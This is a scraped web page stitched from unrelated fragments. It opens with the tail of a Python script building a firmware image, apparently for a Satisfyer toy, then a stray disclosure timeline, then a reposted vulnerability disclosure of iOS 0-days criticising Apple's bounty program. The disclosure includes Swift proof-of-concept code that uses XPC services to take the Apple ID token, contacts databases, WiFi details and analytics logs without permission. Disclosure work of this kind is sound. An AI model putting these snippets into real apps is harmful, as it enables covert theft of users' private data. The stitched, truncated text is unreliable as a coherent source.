FILE += "\x10\x00"

# download addr
FILE += "\x10\x00"

FILE +="\x05\x00\x00\x00"

FILE += "ZZaa"

### image file 1

# ic version
FILE += "\x05"

# secure version
FILE += "\x00"

# no idea
FILE += "\x13\x37"

# image id
FILE +="\x01\x01"

# crc16
FILE += "\x8e\x04"

# size
FILE +="\x40\x00\x00\x00"

for i in range(0x40):
    FILE += "A"

with open("./thefile.bin", "w") as f:

If anybody happens to have a flashable Satisfyer 

 file lying around, I’ll offer $13.37 PayPal for it, I swear.


  • 06/11/2021: Sent report for insecure coturn setup with hardcoded admin password to
  • 06/18/2021: Received notification that this issue might be addressed in the future.
  • 06/19/2021: Sent report for authentication bypass vulnerability to
  • 06/25/2021: Added additional details to report and asked for acknowledgement (again).
  • 06/30/2021: Sent info that blog post may be released soon to
  • 06/30/2021: Received acknowledgement, agreed that blog post will be released in max. two weeks, or before in case the vulnerability was fixed earlier.
  • 07/14/2021: Publishing blog post.

Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

Original text by Denis Tokarev @illusionofchaos

I want to share my frustrating experience participating in Apple Security Bounty program. I’ve reported four 0-day vulnerabilities this year between March 10 and May 4, as of now three of them are still present in the latest iOS version (15.0) and one was fixed in 14.7, but Apple decided to cover it up and not list it on the security content page. When I confronted them, they apologized, assured me it happened due to a processing issue and promised to list it on the security content page of the next update. There were three releases since then and they broke their promise each time.

Ten days ago I asked for an explanation and warned then that I would make my research public if I don’t receive an explanation. My request was ignored so I’m doing what I said I would. My actions are in accordance with responsible disclosure guidelines (Google Project Zero discloses vulnerabilities in 90 days after reporting them to vendor, ZDI — in 120). I have waited much longer, up to half a year in one case.

I’m not the first person that is unhappy with Apple Security Bounty program. Here are some other reports and opinions:

Here are links to GitHub repositories that contain PoC source code that I’ve sent to Apple. Each repository contains an app that gathers sensitive information and presents it in the UI.

Gamed 0-day

Any app installed from the App Store may access the following data without any prompt from the user:

  • Apple ID email and full name associated with it
  • Apple ID authentication token which allows to access at least one of the endpoints on * on behalf of the user
  • Complete file system read access to the Core Duet database (contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about all user’s interaction with these contacts (including timestamps and statistics), also some attachments (like URLs and texts)
  • Complete file system read access to the Speed Dial database and the Address Book database including contact pictures and other metadata like creation and modification dates (I’ve just checked on iOS 15 and this one inaccessible, so that one must have been quietly fixed recently)

Here is a short proof of concept (this one won’t actually compile, see GitHub repo for a workaround).

<strong>let</strong> connection = NSXPCConnection(machServiceName: "", options: NSXPCConnection.Options.privileged)!
<strong>let</strong> proxy = connection.remoteObjectProxyWithErrorHandler({ _ <strong>in</strong> }) <strong>as</strong>! GKDaemonProtocol
<strong>let</strong> pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) <strong>in</strong>
    accountService.authenticatePlayerWithExistingCredentials(handler: { response, error <strong>in</strong>
        <strong>let</strong> appleID = response.credential.accountName
        <strong>let</strong> token = response.credential.authenticationToken

    utilityService.requestImageData(<strong>for</strong>: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data <strong>in</strong>
        <strong>let</strong> addressBookData = data

How it happens:

  • XPC service
     doesn’t properly check for
  • Even if Game Center is disabled on the device, invoking 
     returns several XPC proxy objects (
    , etc.).
  • If game center is enabled on the device (even if it’s not enabled for the app in App Store Connect and app doesn’t contain
     entitlement), invoking 
     returns an object containing Apple ID of the user, DSID and Game Center authentication token (which allows to send requests to
     on behalf of the user). Invoking 
     on GKProfileService returns an object containing first and last name of the user’s Apple ID. Invoking 
     return an object with information about user’s friend in Game Center.
  • Even if game center is disabled, it’s not enabled for the app in App Store Connect and app doesn’t contain
     entitlement, invoking 
     allows to read arbitrary files outside of the app sandbox by passing file URLs to that method. Among the files (but not limited to) that can be accessed that way are the following: 
     — contains mobile gestalt cache 
     — contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about user’s interaction with these contacts (including timestamps and statistics) 
     — contains favorite contacts and their phone numbers 
     — contains complete Address Book database 
     — contains photos of Address book contacts
  • Invoking 
     on GKUtilityService might allow to write arbitrary data to a location outside of the app sandbox.

On the Apple Security Bounty Program page this vulnerabilty is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. “Sensitive data” access includes gaining a broad access (i.e., the full database) from Contacts).

Nehelper Enumerate Installed Apps 0-day

The vulnerably allows any user-installed app to determine whether any app is installed on the device given its bundle ID.

XPC endpoint
 has a method accessible to any app that accepts a bundle ID as a parameter and returns an array containing some cache UUIDs if the app with matching bundle ID is installed on the device or an empty array otherwise. This happens in 
-[NEHelperCacheManager onQueueHandleMessage:]

<strong>func</strong> <strong>isAppInstalled</strong>(bundleId: String) -&gt; Bool {
    <strong>let</strong> connection = xpc_connection_create_mach_service("", nil, 2)!
    xpc_connection_set_event_handler(connection, { _ <strong>in</strong> })
    <strong>let</strong> xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1)
    xpc_dictionary_set_uint64(xdict, "cache-command", 3)
    xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId)
    <strong>let</strong> reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    <strong>if</strong> <strong>let</strong> resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil {
        <strong>return</strong> true
    <strong>return</strong> false

Nehelper Wifi Info 0-day

XPC endpoint
 accepts user-supplied parameter 
, and if its value is less than or equal to 524288,
 entiltlement check is skipped. Ths makes it possible for any qualifying app (e.g. posessing location access authorization) to gain access to Wifi information without the required entitlement. This happens in 
-[NEHelperWiFiInfoManager checkIfEntitled:]

<strong>func</strong> <strong>wifi_info</strong>() -&gt; String? {
    <strong>let</strong> connection = xpc_connection_create_mach_service("", nil, 2)
    xpc_connection_set_event_handler(connection, { _ <strong>in</strong> })
    <strong>let</strong> xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
    xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
    xpc_dictionary_set_string(xdict, "interface-name", "en0")
    <strong>let</strong> reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    <strong>if</strong> <strong>let</strong> result = xpc_dictionary_get_value(reply, "result-data") {
        <strong>let</strong> ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
        <strong>let</strong> bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
        <strong>return</strong> "SSID: \(ssid)\nBSSID: \(bssid)"
    } <strong>else</strong> {
        <strong>return</strong> nil

Analyticsd (fixed in iOS 14.7)

This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day… and Analytics-Daily…). These logs contain the following information (including, but not limited to):

  • medical information (heart rate, count of detected atrial fibrillation and irregular heart rythm events)
  • menstrual cycle length, biological sex and age, whether user is logging sexual activity, cervical mucus quality, etc.
  • device usage information (device pickups in different contexts, push notifications count and user’s action, etc.)
  • screen time information and session count for all applications with their respective bundle IDs
  • information about device accessories with their manufacturer, model, firmware version and user-assigned names
  • application crashes with bundle IDs and exception codes
  • languages of web pages that user viewed in Safari

All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That’s why it’s very hypocritical of Apple to claim that they deeply care about privacy. All this data was being collected and available to an attacker even if «Share analytics» was turned off in settings.

<strong>func</strong> <strong>analytics_json</strong>() -&gt; String? {
    <strong>let</strong> connection = xpc_connection_create_mach_service("", nil, 2)
    xpc_connection_set_event_handler(connection, { _ <strong>in</strong> })
    <strong>let</strong> xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_string(xdict, "command", "log-dump");
    <strong>let</strong> reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
    <strong>return</strong> xpc_dictionary_get_string(reply, "log-dump");


April 29 2021 — I sent a detailed report to Apple

April 30 2021 — Apple replied that they had reviewed the report and are investigated

May 20 2021 — I’ve requested a status update from Apple (and recieved no reply)

May 30 2021 — I’ve requested a status update from Apple

June 3 2021 — Apple replied that they plan to address the issue in the upcoming update

July 19 2021 — iOS 14.7 is released with the fix

July 20 2021 — I’ve requested a status update from Apple

July 21 2021 — iOS 14.7 security contents list is published, this vulnerability is not mentioned

July 22 2021 — I’ve asked Apple a question why the vulnerability is not on the list Same day I receive the following reply: Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience.

July 26 2021 — iOS 14.7.1 security contents list is published, still no mention of this vulnerability

September 13 2021 — iOS 14.8 security contents list is published, still no mention of this vulnerability. Same day I asked for an explanation and informed Apple that I would make all my reasearch public unless I receive a reply soon

September 20 2021 — iOS 15.0 security contents list is published, still no mention of this vulnerability

September 24 2021 — I still haven’t received any reply so I publish this article


September 25 2021 — exactly 24 hours after this publication I finally received a reply from Apple. Here is what is said:

We saw your blog post regarding this issue and your other reports. We apologize for the delay in responding to you.

We want to let you know that we are still investigating these issues and how we can address them to protect customers. Thank you again for taking the time to report these issues to us, we appreciate your assistance. 

Please let us know if you have any questions.